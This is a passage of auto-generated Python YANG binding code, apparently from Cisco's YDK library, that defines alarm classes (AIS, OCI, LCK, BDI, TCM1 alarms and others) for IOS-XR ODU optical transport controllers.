self._children_name_map["tcm5_sd_ber"] = "tcm5-sd-ber"
self.tcm6_ais = Odu.Controllers.Controller.Info.Alarm.Tcm6Ais()
self.tcm6_ais.parent = self
self._children_name_map["tcm6_ais"] = "tcm6-ais"
self.tcm6_ltc = Odu.Controllers.Controller.Info.Alarm.Tcm6Ltc()
self.tcm6_ltc.parent = self
self._children_name_map["tcm6_ltc"] = "tcm6-ltc"
self.tcm6_oci = Odu.Controllers.Controller.Info.Alarm.Tcm6Oci()
self.tcm6_oci.parent = self
self._children_name_map["tcm6_oci"] = "tcm6-oci"
self.tcm6_lck = Odu.Controllers.Controller.Info.Alarm.Tcm6Lck()
self.tcm6_lck.parent = self
self._children_name_map["tcm6_lck"] = "tcm6-lck"
self.tcm6_iae = Odu.Controllers.Controller.Info.Alarm.Tcm6Iae()
self.tcm6_iae.parent = self
self._children_name_map["tcm6_iae"] = "tcm6-iae"
self.tcm6_biae = Odu.Controllers.Controller.Info.Alarm.Tcm6Biae()
self.tcm6_biae.parent = self
self._children_name_map["tcm6_biae"] = "tcm6-biae"
self.tcm6_bdi = Odu.Controllers.Controller.Info.Alarm.Tcm6Bdi()
self.tcm6_bdi.parent = self
self._children_name_map["tcm6_bdi"] = "tcm6-bdi"
self.tcm6_tim = Odu.Controllers.Controller.Info.Alarm.Tcm6Tim()
self.tcm6_tim.parent = self
self._children_name_map["tcm6_tim"] = "tcm6-tim"
self.tcm6_sf_ber = Odu.Controllers.Controller.Info.Alarm.Tcm6SfBer()
self.tcm6_sf_ber.parent = self
self._children_name_map["tcm6_sf_ber"] = "tcm6-sf-ber"
self.tcm6_sd_ber = Odu.Controllers.Controller.Info.Alarm.Tcm6SdBer()
self.tcm6_sd_ber.parent = self
self._children_name_map["tcm6_sd_ber"] = "tcm6-sd-ber"
self.gfp_lfd = Odu.Controllers.Controller.Info.Alarm.GfpLfd()
self.gfp_lfd.parent = self
self._children_name_map["gfp_lfd"] = "gfp-lfd"
self.gfp_locs = Odu.Controllers.Controller.Info.Alarm.GfpLocs()
self.gfp_locs.parent = self
self._children_name_map["gfp_locs"] = "gfp-locs"
self.gfp_loccs = Odu.Controllers.Controller.Info.Alarm.GfpLoccs()
self.gfp_loccs.parent = self
self._children_name_map["gfp_loccs"] = "gfp-loccs"
self.gfp_upm = Odu.Controllers.Controller.Info.Alarm.GfpUpm()
self.gfp_upm.parent = self
self._children_name_map["gfp_upm"] = "gfp-upm"
self._segment_path = lambda: "alarm"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm, [], name, value)
class Oci(_Entity_):
"""
Open Connection Indiction
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Oci, self).__init__()
self.yang_name = "oci"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "oci"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Oci, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Oci']['meta_info']
class Ais(_Entity_):
"""
Alarm Indication Signal
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Ais, self).__init__()
self.yang_name = "ais"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "ais"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Ais, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Ais']['meta_info']
class Lck(_Entity_):
"""
Upstream Connection Locked
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Lck, self).__init__()
self.yang_name = "lck"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "lck"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Lck, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Lck']['meta_info']
class Bdi(_Entity_):
"""
Backward Defect Indication
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Bdi, self).__init__()
self.yang_name = "bdi"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "bdi"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Bdi, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Bdi']['meta_info']
class Eoc(_Entity_):
"""
GCC End of Channel
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Eoc, self).__init__()
self.yang_name = "eoc"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "eoc"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Eoc, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Eoc']['meta_info']
class Ptim(_Entity_):
"""
Payload Type Identifier Mismatch
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Ptim, self).__init__()
self.yang_name = "ptim"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "ptim"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Ptim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Ptim']['meta_info']
class Tim(_Entity_):
"""
Trace Identifier Mismatch information
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tim, self).__init__()
self.yang_name = "tim"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tim"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tim']['meta_info']
class Iae(_Entity_):
"""
Incoming Alignment Error
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Iae, self).__init__()
self.yang_name = "iae"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "iae"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Iae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Iae']['meta_info']
class Biae(_Entity_):
"""
Backward Incoming Alignment Error
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Biae, self).__init__()
self.yang_name = "biae"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "biae"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Biae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Biae']['meta_info']
class SfBer(_Entity_):
"""
SF BER alarm
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.SfBer, self).__init__()
self.yang_name = "sf-ber"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "sf-ber"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.SfBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.SfBer']['meta_info']
class SdBer(_Entity_):
"""
SD BER alarm
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.SdBer, self).__init__()
self.yang_name = "sd-ber"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "sd-ber"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.SdBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.SdBer']['meta_info']
class Csf(_Entity_):
"""
Client Signal Failure
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Csf, self).__init__()
self.yang_name = "csf"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "csf"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Csf, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Csf']['meta_info']
class Tcm1Ais(_Entity_):
"""
TCM1 Alarm Indication Signal
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm1Ais, self).__init__()
self.yang_name = "tcm1-ais"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm1-ais"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Ais, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Ais']['meta_info']
class Tcm1Ltc(_Entity_):
"""
TCM1 Loss of Tandem connection Monitoring
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm1Ltc, self).__init__()
self.yang_name = "tcm1-ltc"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm1-ltc"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Ltc, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Ltc']['meta_info']
class Tcm1Oci(_Entity_):
"""
TCM1 Open Connection Indiction
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm1Oci, self).__init__()
self.yang_name = "tcm1-oci"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm1-oci"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Oci, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Oci']['meta_info']
class Tcm1Lck(_Entity_):
"""
TCM1 Upstream Connection Locked
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm1Lck, self).__init__()
self.yang_name = "tcm1-lck"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm1-lck"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Lck, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Lck']['meta_info']
class Tcm1Iae(_Entity_):
"""
TCM1 Incoming Alignment Error
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm1Iae, self).__init__()
self.yang_name = "tcm1-iae"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm1-iae"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Iae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Iae']['meta_info']
class Tcm1Biae(_Entity_):
"""
TCM1 Backward Incoming Alignment Error
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm1Biae, self).__init__()
